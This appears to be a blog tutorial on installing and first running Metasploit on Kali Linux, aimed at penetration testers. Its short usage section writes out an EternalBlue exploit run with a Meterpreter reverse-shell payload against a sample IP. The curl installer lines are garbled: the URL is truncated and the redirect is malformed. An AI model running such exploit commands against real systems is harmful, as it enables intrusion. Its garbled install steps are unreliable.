How to Setup Metasploit on Kali Linux (Step-by-Step Guide)
Metasploit is one of the most powerful and widely used frameworks in the world of cybersecurity. Developed by Rapid7, it allows penetration testers and ethical hackers to discover, exploit, and validate vulnerabilities in systems. In this tutorial, you’ll learn how to set up Metasploit on Kali Linux, from installation to your first run.
Why Use Metasploit on Kali Linux?
Kali Linux is a Debian-based Linux distribution tailored for cybersecurity professionals. It comes with a large collection of pre-installed tools, including Metasploit. However, if your system doesn’t have it installed or you want to install the latest version, this guide has you covered.
Prerequisites
Before installing Metasploit, make sure you have the following:
- Kali Linux installed (bare metal, virtual machine, or dual boot)
- Root or sudo access
- Stable internet connection (for downloading dependencies)
How to Install Metasploit on Kali Linux
Step 1: Update Your System
Keep your system packages up to date before installing any new tools:
$ sudo apt update && sudo apt upgrade -y
Step 2: Install Metasploit Framework
Metasploit is available in Kali Linux’s default repository. To install it, run:
$ sudo apt install metasploit-framework -y
This command will install all required dependencies along with the framework.
Step 3: Verify the Installation
Once installed, check the version to confirm it’s working:
msfconsole --version
You should see the version number if everything is installed correctly.
Optional: Install the Latest Metasploit from Rapid7
If you want the latest cutting-edge version, install it directly from Rapid7’s GitHub repository.
Step 1: Download and Run the Installer Script
$ curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/
$ msfinstall > msfinstall
$ chmod +x msfinstall
$ sudo ./msfinstall
This script automates the installation and ensures you get the latest build.
Launching Metasploit for the First Time
To start Metasploit, simply open a terminal and type:
$ msfconsole
It may take a few seconds to initialize. Once it’s loaded, you’ll see the Metasploit banner and a prompt like this:
=[ metasploit v6.x.x-dev ]
+ -- --=[ 2201 exploits - 1175 auxiliary - 398 payloads ]
+ -- --=[ 45 encoders - 10 nops - 9 evasion ]Basic Usage of Metasploit
Once you’re inside msfconsole, you can begin using Metasploit’s modules and tools.
1. Search for Exploits
Use the search command to find modules:
$ search type:exploit name:windows2. Load an Exploit Module
Once you’ve found an exploit, load it using:
$ use exploit/windows/smb/ms17_010_eternalblue3. Set Exploit Options
Configure the necessary options like target IP address and payload:
$ set RHOSTS 192.168.1.100
$ set PAYLOAD windows/x64/meterpreter/reverse_tcp
$ set LHOST 192.168.1.104. Launch the Exploit
Once all parameters are set:
$ exploitCommon Issues and Troubleshooting
Problem: msfconsole Command Not Found
Solution: Ensure the framework is correctly installed. Re-run the installation command if necessary.
Problem: Database Not Connected
Metasploit uses PostgreSQL. Start the service and initialize the database:
$ sudo service postgresql start
$ msfdb initConclusion
Metasploit is a must-have toolkit for any cybersecurity professional. Whether you’re a beginner or an expert, setting it up on Kali Linux is a straightforward process. Always ensure you’re using the tool for ethical and legal purposes.
Now that you’ve installed and launched Metasploit, explore its powerful features to perform security testing on your own network or lab environment.
FAQ: Metasploit on Kali Linux
Q: Is Metasploit legal to use?
A: Yes, as long as it’s used for authorized security testing or educational purposes.
Q: Do I need the internet to use Metasploit?
A: Not always. You need the internet for updates and downloading modules, but local testing can be done offline.
Q: Can I install Metasploit on other operating systems?
A: Yes, Metasploit is available for Windows (via WSL), macOS, and most Linux distributions.
